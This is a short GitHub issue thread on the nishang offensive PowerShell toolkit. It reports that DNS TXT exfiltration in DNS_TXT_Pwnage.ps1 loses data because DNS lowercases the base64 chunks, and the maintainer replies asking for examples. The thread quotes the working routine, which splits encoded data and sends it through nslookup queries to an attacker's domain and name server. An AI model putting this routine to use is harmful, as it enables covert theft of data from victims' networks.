### ISSUE TITLE
Loosing information when using DNS TXT exfiltration

### ISSUE THREAD

**Issue by firefalc0n** [samratashok/nishang#59]
Regarding **DNS_TXT_Pwnage.ps1**, using DNS exfiltration option :

    {
        $lengthofsubstr = 0
        $code = Compress-Encode
        $queries = [int]($code.Length/63)
        while ($queries -ne 0)
        {
            $querystring = $code.Substring($lengthofsubstr,63)
            Invoke-Expression "nslookup -querytype=txt $querystring.$DomainName $ExfilNS"
            $lengthofsubstr += 63
            $queries -= 1
        }
        $mod = $code.Length%63
        $query = $code.Substring($code.Length - $mod, $mod)
        Invoke-Expression "nslookup -querytype=txt $query.$DomainName $ExfilNS"
    }

The variable ($querystring) is base 64 encoded, it mean that it can contain uppercase caracters. However, nslookup command, or DNS queries in general are sent only on lowercase. In the DNS C2 side, we can't get all the information and the decompression routine will not work.

**Comment by samratashok** [comment]
Need couple of examples to understand the issue before I try anything.

**Comment by samratashok** [comment]
Update please?
